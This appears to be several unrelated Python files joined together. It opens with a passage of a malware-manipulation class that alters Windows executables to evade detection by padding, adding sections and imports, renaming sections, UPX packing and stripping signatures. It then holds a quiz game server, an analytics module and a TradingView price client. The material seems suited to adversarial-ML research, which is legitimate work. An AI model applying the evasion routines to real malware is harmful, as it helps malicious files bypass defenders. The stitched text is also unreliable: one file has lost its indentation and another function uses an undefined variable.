        self.max_append_log2 = 8

    def __random_length(self):
        # Random power of two in [2**min_append_log2, 2**max_append_log2].
        return 2**random.randint(self.min_append_log2, self.max_append_log2)

    def __binary_to_bytez(self, binary, dos_stub=False, imports=False, overlay=False, relocations=False, resources=False, tls=False):
        # write the (possibly modified) lief binary back as bytes
        builder = lief.PE.Builder(binary)
        builder.build_dos_stub(dos_stub)  # rebuild DOS stub
        builder.build_imports(imports)  # rebuild IAT in another section
        builder.patch_imports(imports)  # patch original import table with trampolines to new import table
        builder.build_overlay(overlay)  # rebuild overlay
        builder.build_relocations(relocations)  # rebuild relocation table in another section
        builder.build_resources(resources)  # rebuild resources in another section
        builder.build_tls(tls)  # rebuild TLS object in another section
        builder.build()  # perform the build process
        return array.array('B', builder.get_build()).tobytes()

    def overlay_append(self, seed=None):
        """Append a random-length run of random bytes to the overlay."""
        random.seed(seed)
        L = self.__random_length()
        # choose the upper bound for a uniform distribution in [0, upper]:
        #   upper=0   -> append all zeros
        #   upper=126 -> append "printable ascii"
        #   upper=255 -> append any byte value
        upper = random.randrange(256)
        return self.bytez + bytes([random.randint(0, upper) for _ in range(L)])

    def imports_append(self, seed=None):
        """Append imports from a randomly chosen common library.

        Picks a library contributing at least 20 functions, writes the list
        for the external helper tool, and reads the rewritten binary back.
        """
        libname = random.choice(list(COMMON_IMPORTS))
        while(len(list(COMMON_IMPORTS[libname])) < 20):
            libname = random.choice(list(COMMON_IMPORTS))
        with open("imports.txt", 'w') as imports_file:
            imports_file.write(libname + '\n')
            for fun in list(COMMON_IMPORTS[libname]):
                imports_file.write(fun + '\n')
        with open("modified.exe", 'wb') as file1:
            file1.write(self.bytez)
        cmd = "portable-executable/project-add-imports/bin/Debug/project-append-import modified.exe imports.txt modified.exe"
        os.system(cmd)
        with open("modified.exe", "rb") as binfile:
            self.bytez = binfile.read()
        return self.bytez

    def section_add(self, seed=None):
        """Add a new section (name drawn from COMMON_SECTION_NAMES) via helper tool."""
        section = ""
        # retry until a non-blank section name is drawn
        while(len(section.strip()) < 1):
            section = random.choice(COMMON_SECTION_NAMES)
        with open("modified.exe", 'wb') as file1:
            file1.write(self.bytez)
        cmd = "portable-executable/project-add-sections/bin/Debug/project-append-section modified.exe " + section + " " + section_content + " modified.exe"
        os.system(cmd)
        with open("modified.exe", "rb") as binfile:
            self.bytez = binfile.read()
        return self.bytez

    def section_append(self, seed=None):
        """Append random bytes to a random section (changes size and entropy)."""
        random.seed(seed)
        binary1 = lief.parse(self.bytez, name="")
        with open("modified.exe", 'wb') as file1:
            # Bug fix: the original wrote the undefined name `bytez`
            # (NameError); the current payload is self.bytez.
            file1.write(self.bytez)
        binary = lief.PE.Binary("modified.exe", lief.PE.PE_TYPE.PE32)
        # Nothing to append to if either view has no sections.
        if(len(binary1.sections) == 0):
            self.bytez = self.__binary_to_bytez(binary)
            return self.bytez
        if(len(binary.sections) == 0):
            self.bytez = self.__binary_to_bytez(binary)
            return self.bytez
        targeted_section = random.choice(binary.sections)
        L = self.__random_length()
        # only fill up to the section's slack space
        available_size = targeted_section.size - len(targeted_section.content)
        if L > available_size:
            L = available_size
        upper = random.randrange(256)
        targeted_section.content = targeted_section.content + [random.randint(0, upper) for _ in range(L)]
        self.bytez = self.__binary_to_bytez(binary)
        return self.bytez

    def section_rename(self, seed=None):
        """Rename randomly chosen sections (10 draws, possibly repeating)."""
        binary = lief.parse(self.bytez, name="")
        for i in range(0, 10):
            targeted_section = random.choice(binary.sections)
            targeted_section.name = random.choice(COMMON_SECTION_NAMES)[:7]  # current version of lief not allowing 8 chars?
        self.bytez = self.__binary_to_bytez(binary)
        return self.bytez

    def upx_pack(self, seed=None):
        """Pack the binary with UPX using randomized options (tested with UPX 3.91)."""
        random.seed(seed)
        tmpfilename = os.path.join(
            tempfile._get_default_tempdir(), next(tempfile._get_candidate_names()))
        # dump bytez to a temporary file
        with open(tmpfilename, 'wb') as outfile:
            outfile.write(self.bytez)
        options = ['--force', '--overlay=copy']
        compression_level = random.randint(1, 9)
        options += ['-{}'.format(compression_level)]
        # randomized optional switches:
        options += ['--compress-exports={}'.format(random.randint(0, 1))]
        options += ['--compress-icons={}'.format(random.randint(0, 3))]
        options += ['--compress-resources={}'.format(random.randint(0, 1))]
        options += ['--strip-relocs={}'.format(random.randint(0, 1))]
        with open(os.devnull, 'w') as DEVNULL:
            retcode = subprocess.call(
                ['upx'] + options + [tmpfilename, '-o', tmpfilename + '_packed'], stdout=DEVNULL, stderr=DEVNULL)
        os.unlink(tmpfilename)
        if retcode == 0:  # successfully packed
            with open(tmpfilename + '_packed', 'rb') as infile:
                self.bytez = infile.read()
            os.unlink(tmpfilename + '_packed')
        # on failure, self.bytez is left unmodified
        return self.bytez

    def upx_unpack(self, seed=None):
        """Unpack the binary with `upx -d`; on failure bytes are unchanged."""
        tmpfilename = os.path.join(
            tempfile._get_default_tempdir(), next(tempfile._get_candidate_names()))
        with open(tmpfilename, 'wb') as outfile:
            outfile.write(self.bytez)
        with open(os.devnull, 'w') as DEVNULL:
            retcode = subprocess.call(
                ['upx', tmpfilename, '-d', '-o', tmpfilename + '_unpacked'], stdout=DEVNULL, stderr=DEVNULL)
        os.unlink(tmpfilename)
        if retcode == 0:  # successfully unpacked
            with open(tmpfilename + '_unpacked', 'rb') as result:
                self.bytez = result.read()
            os.unlink(tmpfilename + '_unpacked')
        return self.bytez

    def remove_signature(self, seed=None):
        """Zero out the certificate-table data directory, dropping any Authenticode signature."""
        binary = lief.parse(self.bytez, name="")
        if binary.has_signature:
            for i, e in enumerate(binary.data_directories):
                if e.type == lief.PE.DATA_DIRECTORY.CERTIFICATE_TABLE:
                    break
            if e.type == lief.PE.DATA_DIRECTORY.CERTIFICATE_TABLE:
                # remove signature from certificate table
                e.rva = 0
                e.size = 0
                self.bytez = self.__binary_to_bytez(binary)
                return self.bytez
        # if no signature found, self.bytez is unmodified
        return self.bytez

    def add_signature(self, seed=None):
        # http://manpages.ubuntu.com/manpages/bionic/man1/signcode.1.html
        # sign the PE file using your certificate -- not implemented; no-op.
        return self.bytez
##############################
def identity(bytez, seed=None):
    """No-op action: return the input bytes unchanged (*seed* is ignored)."""
    return bytez
######################
# explicitly list so that these may be used externally
# Maps an externally-visible action name to the name of the
# MalwareManipulator method that implements it (resolved with
# __getattribute__ inside modify_without_breaking).
ACTION_TABLE = {
    # 'do_nothing': identity,
    'overlay_append': 'overlay_append',
    'section_rename' : 'section_rename',
    'section_add' : 'section_add',
    'imports_append' : 'imports_append'
}
# ACTION_TABLE = {
# # 'do_nothing': identity,
# 'overlay_append': 'overlay_append',
# 'section_rename' : 'section_rename',
# 'add_signature' : 'add_signature',
# 'section_add' : 'section_add',
# 'imports_append' : 'imports_append',
# 'remove_signature': 'remove_signature'
# }
def calculate_hash(bytez):
    """Return the SHA-256 hex digest of *bytez*.

    The original computed the digest and discarded it (its print was
    commented out); returning the digest makes the function usable while
    staying backward compatible with callers that ignore the return value.
    """
    m = hashlib.sha256()
    m.update(bytez)
    return m.hexdigest()
def modify_without_breaking(bytez, actions=None, seed=None):
    """Apply each named action to *bytez*, each in a sandboxed child process.

    LIEF occasionally segfaults or hangs on rare inputs; running each action
    in a child process shelters this process from both, leaving the bytes
    unchanged when the child fails. Returns the (possibly modified) bytes.
    """
    # Avoid the original's mutable default argument; None means "no actions".
    actions = [] if actions is None else actions
    for action in actions:
        _action = ACTION_TABLE[action]

        def helper(_action, shared_list):
            # Turn a segfault in the child into a catchable RuntimeError.
            def sig_handler(signum, frame):
                raise RuntimeError
            signal.signal(signal.SIGSEGV, sig_handler)
            bytez = array.array('B', shared_list[:]).tobytes()
            # TODO: LIEF is chatty. redirect stdout and stderr to /dev/null
            if type(_action) is str:
                _action = MalwareManipulator(bytez).__getattribute__(_action)
            else:
                _action = functools.partial(_action, bytez)
            try:
                shared_list[:] = _action(seed)
            except (RuntimeError, UnicodeDecodeError, TypeError, lief.not_found) as e:
                # exceptions not yet handled by the public release of LIEF;
                # shared_list (and thus bytez) remains unchanged
                print("==== exception in child process ===")
                print(e)

        # Communicate through a managed list: multiprocessing.Array is
        # fixed-size, but the action may change the payload length.
        manager = multiprocessing.Manager()
        shared_list = manager.list()
        shared_list[:] = bytez  # copy bytez to shared list
        p = multiprocessing.Process(target=helper, args=(_action, shared_list))
        p.start()
        # Bug fix: Process.join(timeout) does NOT raise on timeout -- it just
        # returns with the child still alive, so the original's
        # `except multiprocessing.TimeoutError` was dead code. Check
        # explicitly and terminate a hung child.
        p.join(5)
        if p.is_alive():
            print('==== timeouterror ')
            p.terminate()
            p.join()
        bytez = array.array('B', shared_list[:]).tobytes()  # copy result from child
    return bytez
server.py | #!/usr/bin/env python3
"""Game server"""
from socket import AF_INET, socket, SOCK_STREAM, SOL_SOCKET, SO_REUSEADDR
from threading import Thread
from game import get_question, get_random_mapping
from ui import get_messages
import time
import signal
import sys
USAGE = """
While waiting for a game to start, you can type 'ready' to ready up.
When more than half of the connected players is ready, the game starts.
To answer to the questions type either '0', '1' or '2'.
To change username, type 'setname <new_username>' note that no spaces are allowed in usernames.
To quit the game, type 'quit'.
The game will last for 300s, during which you should try to answer to as many questions correctly.
Before every question you will be asked to pick a number between 0 and 2,
if you pick the wrong one, the game will end for you.
Every question has 3 possible answers,
if you pick the correct one you will be awarded +1 points,
if you pick the wrong one you will be awarded -1 points,
note that your score can become negative.
"""
HOST = '0.0.0.0'
PORT = 53000
BUFSIZ = 1024
ADDR = (HOST, PORT)
SERVER = socket(AF_INET, SOCK_STREAM)
SERVER.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
SERVER.bind(ADDR)
GAME_DURATION = 300
WAITING = 0
IN_GAME = 1
OVER = 2
state = WAITING
players = []
num_connected_clients = 0
num_ready_clients = 0
all_threads = []
class Player:
    """One connected participant: wraps the client socket plus game state."""

    def __init__(self, client, address, player_id, name, is_api):
        self.client = client
        self.address = address
        self.player_id = player_id
        self.name = name
        self.score = 0
        self.is_api = is_api
        self.to_close = False
        self.is_ready = False

    def msg(self, msg):
        """Send *msg* to the client; any send failure closes the connection."""
        try:
            self.client.send(bytes(msg, "utf8"))
        except:
            self.close("Some communication error occurred")

    def close(self, msg):
        """Send the final scoreboard and goodbye, then drop the client (idempotent)."""
        global num_connected_clients
        try:
            if self.to_close:
                return
            self.to_close = True
            renderers = get_messages(self.is_api)
            self.msg(renderers["scoreboard"]((players, self)))
            self.msg(renderers["quit"](msg))
            num_connected_clients -= 1
            self.client.close()
        except:
            return
def accept_loop():
    """Accept incoming connections while the game is in the WAITING state.

    Each accepted client gets a unique auto-generated name, an API-mode
    probe, a Player record, and a dedicated daemon handler thread.
    """
    global state
    global num_connected_clients
    global num_ready_clients
    global all_threads
    # handle incoming connections
    while state == WAITING:
        try:
            client, client_address = SERVER.accept()
        except ConnectionAbortedError:
            # SERVER was closed elsewhere; stop accepting.
            break
        print("[_] New client (%s:%s)" % client_address)
        client_id = num_connected_clients
        name = "Player" + str(client_id)
        # Append underscores until the name is unique among current players
        # (note: the loop body runs at least once, so every generated name
        # carries at least one trailing underscore).
        bad_name = True
        while bad_name:
            name = name+"_"
            bad_name = False
            for i in players:
                if i.name == name:
                    bad_name = True
                    break
        # check if API: an API client announces itself by sending "api"
        # within the short probe timeout; humans simply stay silent.
        api = False
        try:
            client.settimeout(0.5)
            msg = client.recv(BUFSIZ).decode("utf-8")
            if msg.strip() == "api":
                api = True
        except:
            pass
        # restore a long timeout for the rest of the session
        try:
            client.settimeout(GAME_DURATION)
        except:
            pass
        player = Player(client, client_address, client_id, name, api)
        players.append(player)
        # start the handler thread - one per client
        t = Thread(target=handle_client, args=(player,))
        t.daemon = True
        all_threads.append(t)
        t.start()
        num_connected_clients += 1
def main_loop():
    """Drive the global game state machine.

    Polls once a second until more than half of the connected clients are
    ready, then runs a single fixed-length game round and ends the session.
    """
    global state
    global num_connected_clients
    global num_ready_clients
    while state == WAITING:
        time.sleep(1)
        # strict majority required (with 0 connected, 0 > 0 keeps waiting)
        if num_ready_clients*2 > num_connected_clients:
            state = IN_GAME
    # Game loop: handle_client threads do the actual work; this thread just
    # times the round.
    print("Entering game")
    time.sleep(GAME_DURATION)
    state = OVER
    print(players)
def get_response(player):
    """Read commands from *player* until a numeric answer (0/1/2) arrives.

    Handles 'setname <name>' and 'quit' in-band. Returns the chosen int, or
    None when the player was closed (communication error, disconnect, quit).
    """
    msgs = get_messages(player.is_api)
    while True:
        try:
            raw = player.client.recv(BUFSIZ)
            ans = raw.decode("utf8").strip().split()
        except:
            player.close("Some communication error occurred")
            break
        # Bug fix: recv() returning b'' means the peer closed the socket.
        # The original treated it like a blank line and spun in a tight
        # busy loop forever on disconnect.
        if not raw:
            player.close("Some communication error occurred")
            break
        if len(ans) == 0:
            continue
        elif len(ans) == 2 and ans[0] == "setname":
            name = ans[1]
            bad_name = False
            for i in players:
                if i.name == name:
                    bad_name = True
                    player.msg(msgs["message"]("This name is already in use, please select another name"))
                    break
            if not bad_name:
                player.name = name
                player.msg(msgs["message"]("You changed name to %s" % name))
        elif len(ans) == 1 and ans[0] == "quit":
            player.close("You quit the game")
            break
        elif len(ans) == 1 and ans[0].isdigit():
            res = int(ans[0])
            if res == 0 or res == 1 or res == 2:
                return res
        else:
            player.msg(msgs["message"]("Unknown command"))
"""Handle a single client connection."""
# prende il socket del client come argomento della funzione.
# prende il socket del client come argomento della funzione.
def handle_client(player):
    """Serve one client for the whole session: lobby phase, then game rounds.

    Runs on its own daemon thread. Loops in the lobby until the global game
    state leaves WAITING, then plays question rounds until the round timer
    (main_loop) flips the state to OVER or the player drops out.
    """
    global state
    global num_ready_clients
    # send usage guide
    player.msg(USAGE)
    # send welcome message
    player.msg("You joined the game with name %s\n" % player.name)
    msgs = get_messages(player.is_api)
    # Lobby: nag ready players with a status line; poll unready players for
    # the "ready" keyword on a short timeout so the state check stays fresh.
    while state == WAITING and not player.to_close:
        if player.is_ready:
            player.msg(msgs["message"]("Waiting for game to start ({}/{} players ready)".format(num_ready_clients, num_connected_clients)))
            time.sleep(2)
        else:
            try:
                player.client.settimeout(4)
                player.msg(msgs["message"]("type 'ready' to ready up! ({}/{} players ready)".format(num_ready_clients, num_connected_clients)))
                msg = player.client.recv(BUFSIZ).decode("utf-8")
                if msg.strip() == "ready":
                    player.is_ready = True
                    num_ready_clients += 1
                    player.msg(msgs["message"]("Readyd up"))
            except:
                pass
    # restore the long per-session timeout for the game phase
    try:
        player.client.settimeout(GAME_DURATION)
    except:
        pass
    player.msg(msgs["message"]("Game started!"))
    turn = 0
    while state == IN_GAME:
        # First pick: one of three "question slots"; a wrong slot is a trap.
        player.msg(msgs["choose"](("Choose a question:", [(str(i), "Question " + chr(ord('A') + i)) for i in range(3)])))
        ans = get_response(player)
        if player.to_close:
            break
        is_bad, question = get_question(turn, ans)
        if is_bad:
            player.close("Your choice was the trap, you lost!")
            break
        # Second pick: the actual answer to the question.
        player.msg(msgs["choose"]((question[0], [(str(i[0]), i[1]) for i in enumerate(question[1])])))
        ans = get_response(player)
        if player.to_close:
            break
        if ans == question[2]:
            player.msg(msgs["message"]("Your answer was correct! You get a point"))
            player.score += 1
        else:
            player.msg(msgs["message"]("Your answer was wrong! You lose a point"))
            player.score -= 1
        turn += 1
    player.close("The game is over")
""" Send a broadcast message."""
# il prefisso è usato per l'identificazione del nome.
def broadcast(msg):
    """Send *msg* to every connected player."""
    for member in players:
        member.msg(msg)
def signal_handler(signum, frame):
    """SIGINT handler: flip the game to OVER, notify players, shut the server down.

    Params renamed from (signal, frame): the original first parameter
    shadowed the `signal` module. Handlers are invoked positionally, so
    this is caller-compatible.
    """
    global state
    try:
        print("exiting")
        # Bug fix: without the `global state` declaration this assignment
        # created a local variable and the worker threads never observed
        # the OVER state while the players were being closed.
        state = OVER
        for i in players:
            i.close("The session was terminated by the server")
        SERVER.close()
    except:
        print("something went wrong on exiting")
    finally:
        sys.exit(0)
if __name__ == "__main__":
    # Ctrl-C triggers a clean shutdown (notify players, close socket, exit).
    signal.signal(signal.SIGINT, signal_handler)
    SERVER.listen(5)
    print("In attesa di connessioni...")
    ACCEPT_THREAD = Thread(target=accept_loop)
    MAIN_THREAD = Thread(target=main_loop)
    ACCEPT_THREAD.daemon = True
    MAIN_THREAD.daemon = True
    all_threads.append(ACCEPT_THREAD)
    all_threads.append(MAIN_THREAD)
    ACCEPT_THREAD.start()
    MAIN_THREAD.start()
    # NOTE(review): accept_loop appends per-client threads to all_threads
    # while this loop iterates it -- iterating a list that grows
    # concurrently; confirm this is intended.
    for t in all_threads:
        t.join()
    # All threads finished: end the session and release resources.
    state = OVER
    for i in players:
        i.close("The game is over")
    SERVER.close()
|
analytics.py | import logging
import os
import io
import requests
import calendar
import threading
from datetime import datetime
from mixpanel import Mixpanel, MixpanelException
from copy import deepcopy
from operator import itemgetter
from uuid import uuid4
from .misc import get_app_version, parse_config, convert_string_to_hash
from .io import get_config_dir
logger = logging.getLogger(__name__)
mp = Mixpanel('269cd4e25e97cc15bdca5b401e429892')
class Analytics(object):
    """Collects anonymous usage analytics and ships them to Mixpanel and the
    Label Studio analytics endpoint on a background thread.

    A persistent random user id is stored under the config dir; all sending
    is best-effort and disabled entirely when collect_analytics is false.
    """

    def __init__(self, label_config_line, collect_analytics=True, project_name='', context=None):
        self._label_config_line = label_config_line
        self._collect_analytics = collect_analytics
        # only a hash of the project name ever leaves the machine
        self._project_name = convert_string_to_hash(project_name)
        self._version = get_app_version()
        self._user_id = self._get_user_id()
        self._label_types = self._get_label_types()
        self._context = context or {}

    def _get_user_id(self):
        """Load the persistent anonymous user id, creating and registering it on first run."""
        user_id_file = os.path.join(get_config_dir(), 'user_id')
        if not os.path.exists(user_id_file):
            user_id = str(uuid4())
            with io.open(user_id_file, mode='w') as fout:
                fout.write(user_id)
            if self._collect_analytics:
                try:
                    mp.people_set(user_id, {
                        '$name': user_id,
                        'app': 'label-studio',
                        'version': self._version
                    })
                except MixpanelException as exc:
                    logger.error('Can\'t send user profile analytics. Reason: ' + str(exc), exc_info=True)
            logger.debug('Your user ID ' + str(user_id) + ' is saved to ' + str(user_id_file))
        else:
            with io.open(user_id_file) as f:
                user_id = f.read()
            logger.debug('Your user ID ' + str(user_id) + ' is loaded from ' + str(user_id_file))
        return user_id

    def _get_label_types(self):
        """Summarize the current label config: output type, input types, label count."""
        info = parse_config(self._label_config_line)
        label_types = []
        for tag_info in info.values():
            output_type = tag_info['type']
            input_types = list(map(itemgetter('type'), tag_info['inputs']))
            label_types.append({
                output_type: {
                    'input_types': input_types,
                    'num_labels': len(tag_info['labels'])
                }
            })
        return label_types

    def _get_timestamp_now(self):
        # UTC seconds-since-epoch of the current local time tuple
        return calendar.timegm(datetime.now().timetuple())

    def update_info(self, label_config_line, collect_analytics=True, project_name='', context=None):
        """Refresh settings after a project/config change."""
        if label_config_line != self._label_config_line:
            # Bug fix: remember the new config BEFORE recomputing, otherwise
            # _get_label_types() kept parsing the stale config line.
            self._label_config_line = label_config_line
            self._label_types = self._get_label_types()
        self._collect_analytics = collect_analytics
        self._context = context or {}
        self._project_name = convert_string_to_hash(project_name)

    def send(self, event_name, **kwargs):
        """Fire-and-forget: run send_job on a background thread."""
        thread = threading.Thread(target=self.send_job, args=(event_name,), kwargs=kwargs)
        thread.start()

    def send_job(self, event_name, **kwargs):
        """Send one event to Mixpanel and the analytics endpoint (best-effort)."""
        if not self._collect_analytics:
            return
        data = deepcopy(kwargs)
        data.update(self._context)
        data['version'] = self._version
        data['label_types'] = self._label_types
        data['project'] = self._project_name
        event_name = 'LS:' + str(event_name)
        try:
            mp.track(self._user_id, event_name, data)
        except MixpanelException as exc:
            logger.debug('Can\'t track ' + str(event_name) + ' . Reason: ' + str(exc), exc_info=True)
        json_data = data
        json_data['event'] = event_name
        json_data['server_id'] = self._user_id
        json_data['server_time'] = self._get_timestamp_now()
        try:
            url = 'https://analytics.labelstud.io/prod'
            logger.debug('Sending to {url}:\n{data}'.format(url=url, data=json_data))
            # Robustness fix: without a timeout an unresponsive endpoint
            # would hang this thread forever; timeouts surface as
            # RequestException and are swallowed below like other errors.
            requests.post(url=url, json=json_data, timeout=10)
        except requests.RequestException as exc:
            logger.debug('Analytics error: {exc}'.format(exc=str(exc)))
|
intraday.py | """
IntradayPriceManager connects to TradingView and stores indicators and price series in an
in memory dictionary self._alerts. These indicators are then published to slack periodically.
"""
import datetime
import json
import pandas as pd
import random
import re
import string
import time
import threading
import websocket
from utilfns.slack import send_alert
class IntradayPriceManager():
def __init__(self, debug=False):
self._alerts = {
"indicators": {},
"price": {}
} # In-memory dict of alerts to be sent out to slack
self._debug = debug
self._histbars = 300
self._indicators = []
self._slackchannel = "C01UACFTMTK" # TODO: Shift to config
self._slackfreq = 300 # Every 5 mins
self._state = {}
self._syms = [
"BINANCE:UNIUSD", "BINANCE:ETHUSD", "BINANCE:DOTUSD", "SGX:ES3",
"SGX:CLR"
]
self._t = None
self._timeframe = 240 # Default to 4 hours chart
self._ws_url = "wss://data.tradingview.com/socket.io/websocket"
def get(self, type: str, **kwargs):
    """
    Type is either quote (live) or chart (historical + live)
    Support kwargs:
        syms: list of symbols, e.g. [BINANCE:ETHUSD]
        indicators: list of indicators, e.g. [rsi]
        timeframe: int of minutes of chart time frame, e.g. 240 -> 4 hours chart
        histbars: int of number of historical data points, e.g. 300

    Opens the TradingView websocket and blocks in run_forever(); all
    protocol work happens in the on_* callbacks.
    """
    websocket.enableTrace(True)
    # Lambdas adapt the library's callback signatures to our methods and
    # forward *type*/**kwargs into on_open.
    ws = websocket.WebSocketApp(
        self._ws_url,
        on_open=lambda ws: self.on_open(ws, type, **kwargs),
        on_close=self.on_close,
        on_message=lambda ws, message: self.on_message(ws, message),
        on_error=self.on_error)
    ws.run_forever()
def send_slack(self):
    """
    Periodic slack alerts - Indicators

    Runs forever (intended for a background thread): every self._slackfreq
    seconds, renders the accumulated indicator values as a table and posts
    it to the configured channel.
    """
    while True:
        indicators = self._alerts.get("indicators")
        if indicators:
            # {sym: {indicator: value}} -> one row per symbol
            res = pd.DataFrame(indicators).transpose().reset_index()
            res.rename(columns={"index": "sym"}, inplace=True)
            send_alert(self._slackchannel, [("Indicators", res)])
        time.sleep(self._slackfreq)
def on_message(self, ws, message):
    """Websocket callback: echo heartbeats, parse data frames into self._alerts."""
    # Heartbeat frames look like "~m~<len>~m~~h~<n>" and must be echoed
    # back verbatim to keep the connection alive.
    pattern = re.compile(r'~m~\d+~m~~h~\d+$')
    if pattern.match(message):
        ws.send(message)
    else:
        # Data frames are one or more JSON bodies, each prefixed with a
        # "~m~<len>~m~" length marker; strip the markers and parse each.
        msg_body = re.compile(r'~m~\d+~m~')
        messages = msg_body.split(message)
        for msg in messages:
            if msg:
                parsed_msg = json.loads(msg)
                params = parsed_msg.get("p")
                if parsed_msg.get("m") == "timescale_update":
                    # timescale_update -> initial historical data
                    # TODO: handling of these data for plotting on UI
                    continue
                if parsed_msg.get("m") == "du":
                    # du -> data update; params[0] is the chart session id
                    # we registered in self._state, params[1] the payload.
                    sym = self._state.get(params[0]).get("sym")
                    now = datetime.datetime.now().strftime(
                        '%Y-%m-%d %H:%M:%S')
                    for k, v in params[1].items():
                        if v.get("st"):
                            # study (indicator) update; key is e.g. "rsi_3"
                            indicator = k.split("_")[0]
                            vals = v.get("st")[0].get("v")
                            val = vals[1]
                            val_dict = {"dtime": now, indicator: val}
                            # print({sym: val_dict})
                            if not self._alerts["indicators"].get(sym):
                                self._alerts["indicators"][sym] = {}
                            self._alerts["indicators"][sym][
                                indicator] = val
                        elif v.get("s"):
                            # series (OHLCV bar) update
                            vals = v.get("s")[0].get("v")
                            val_dict = dict(
                                zip([
                                    "dtime", "open", "high", "low", "last",
                                    "vol"
                                ], vals))
                            val_dict["dtime"] = now
                            # print({sym: val_dict})
                            if not self._alerts["price"].get(sym):
                                self._alerts["price"][sym] = {}
                            self._alerts["price"][sym]["last"] = val_dict[
                                "last"]
@staticmethod
def on_error(ws, error):
print(error)
@staticmethod
def on_close(ws):
print("### closed ###")
def on_open(self, ws, type: str, **kwargs):
    """Websocket-open callback: subscribe to quote or chart sessions.

    Starts a daemon thread that authenticates with the anonymous token
    and, based on *type*, opens either a single quote session for all
    symbols or one chart session per symbol (series plus studies).

    :param ws: the connected websocket client
    :param type: "quote" for a quote session; anything else creates chart sessions
    :param kwargs: optional overrides: syms, timeframe, indicators, histbars
    """
    def run(*args, **kwargs):
        # Protocol examples:
        # ~m~52~m~{"m":"quote_create_session","p":["qs_3bDnffZvz5ur"]}
        # ~m~395~m~{"m":"quote_set_fields","p":["qs_3bDnffZvz5ur","ch","chp","lp"]}
        # ~m~89~m~{"m":"quote_add_symbols","p":["qs_3bDnffZvz5ur","SP:SPX",{"flags":["force_permission"]}]}
        # ~m~315~m~{"m":"quote_fast_symbols","p":["qs_3bDnffZvz5ur","SP:SPX","TVC:NDX","CBOE:VIX","TVC:DXY","SGX:ES3","NASDAQ:AAPL","NASDAQ:MSFT","NASDAQ:TSLA","TVC:USOIL","TVC:GOLD","TVC:SILVER","FX:AUDUSD","FX:EURUSD","FX:GBPUSD","FX:USDJPY","BITSTAMP:BTCUSD","BITSTAMP:ETHUSD","COINBASE:UNIUSD","BINANCE:DOGEUSD","BINANCE:DOTUSD"]}
        syms = kwargs.get("syms") or self._syms
        timeframe = f'{kwargs.get("timeframe") or self._timeframe}'
        indicators = kwargs.get("indicators") or self._indicators
        histbars = kwargs.get("histbars") or self._histbars
        send = self._send
        send(ws, "set_auth_token", ["unauthorized_user_token"])
        # Quote session
        if not args or args[0] == "quote":
            # Fix: quote sessions use the "qs_" prefix (see the protocol
            # examples above); the default _gen_session() produced "cs_".
            session = self._gen_session(type="quote")  # Quote session ID
            send(ws, "quote_create_session", [session])
            send(ws, "quote_set_fields", [session, "lp", "volume"])
            for s in syms:
                # Plain loop: the old side-effect list comprehension built
                # a throwaway list.
                ws.send(self._add_symbol(session, s))
            send(ws, "quote_fast_symbols", [session, *syms])
            send(ws, "quote_hibernate_all", [session])
        # Chart session - Prefer to use this over quote sessions since it has a historical series
        else:
            for i, sym in enumerate(syms):
                # Each ticker warrants a separate chart session ID
                c_session = self._gen_session(type="chart")
                self._state[c_session] = {
                    "sym": sym,
                    "indicators": [],
                    "series": [],
                    "timeframe": timeframe
                }
                # Users are allowed to select specific tickers
                send(ws, "chart_create_session", [c_session, ""])
                send(ws, "switch_timezone", [c_session, "Asia/Singapore"])
                send(ws, "resolve_symbol", [
                    c_session, f"symbol_{i}",
                    self._add_chart_symbol(sym)
                ])
                # s (in resp) -> series
                self._state[c_session].get("series").append(f"s_{i}")
                send(ws, "create_series", [
                    c_session, f"s_{i}", f"s_{i}", f"symbol_{i}",
                    timeframe, histbars
                ])
                for indicator in indicators:
                    # Users are allowed to select specific indicators
                    # st (in resp) -> study
                    self._state[c_session].get("indicators").append(
                        f"{indicator}_{i}")
                    send(ws, "create_study", [
                        c_session, f"{indicator}_{i}", f"{indicator}_{i}",
                        f"s_{i}", "Script@tv-scripting-101!",
                        self._indicator_mapper(indicator)
                    ])
    self._t = threading.Thread(target=run, args=(type, ), kwargs=kwargs)
    # Thread.setDaemon() is deprecated (removed in Python 3.13); set the
    # attribute instead.
    self._t.daemon = True
    self._t.start()
def _send(self, ws, func, params):
    """Client sends msg to websockets server."""
    framed = self._create_msg(func, params)
    ws.send(framed)
def _indicator_mapper(self, indicator: str) -> dict:
""" Indicator params that are accepted by the tv server """
return {
"rsi": {
"text":
"1f0fkZ72S0de2geyaUhXXw==_xwY73vljRXeew69Rl27RumLDs6aJ9NLsTYN9Xrht254BTb8uSOgccpLDt/cdRWopwJPNZx40m19yEFwJFswkSi62X4guNJYpXe4A6S9iq2n+OXM6mqWeWzDbjTl0lYmEf1ujbg7i3FvUdV/zCSrqd+iwnvvZSV+O2acpfNLpUlDdB6PZX4Y9y8tlQLWA2PiF8CVJng7DF1LPeecWC4fv+lNg+s5OXU46AjIhc+TFu8DOwiuKjNh7wWz6EZ7gpQS3",
"pineId": "STD;RSI",
"pineVersion": "12.0",
"in_2": {
"v": "",
"f": True,
"t": "resolution"
},
"in_0": {
"v": 14,
"f": True,
"t": "integer"
},
"in_1": {
"v": "close",
"f": True,
"t": "source"
}
}
}.get(indicator.lower())
def _create_msg(self, func, params):
    """Build a framed JSON message, e.g. _create_msg("set_auth_token", "unauthorized_user_token")."""
    payload = json.dumps({"m": func, "p": params})
    framed = self._prepend_header(payload)
    if self._debug:
        print("DEBUG:", framed)
    return framed
def _gen_session(self, type="chart"):
# ~m~52~m~{"m":"quote_create_session","p":["qs_3bDnffZvz5ur"]}
session = ""
if type == "quote":
session = "qs_"
elif type == "chart":
session = "cs_"
else:
raise Exception("Invalid session type")
return session + "".join(random.choices(string.ascii_letters, k=12))
def _add_symbol(self, quote_session: str, sym: str):
    """Quote symbol: _add_symbol("3bDnffZvz5ur", "BINANCE:UNIUSD")"""
    payload = [quote_session, sym]
    return self._create_msg("quote_add_symbols", payload)
def _add_chart_symbol(self, sym: str):
""" Chart symbol - Only required for the first symbol """
return "=" + json.dumps({"symbol": sym})
def _prepend_header(self, msg):
return f'~m~{len(msg)}~m~{msg}'
if __name__ == "__main__":
    ipm = IntradayPriceManager()
    # send_slack loops forever; run it as a daemon so a non-daemon alert
    # thread cannot keep the interpreter alive after the stream exits.
    alerting_thread = threading.Thread(target=ipm.send_slack)
    alerting_thread.daemon = True
    alerting_thread.start()
    ipm.get(type="chart",
            syms=[
                "BINANCE:BTCUSD", "BINANCE:ETHUSD", "BINANCE:DOTUSD",
                "BINANCE:UNIUSD", "BINANCE:SOLUSD"
            ],
            indicators=["rsi"],
            timeframe=240,
            histbars=300)
|
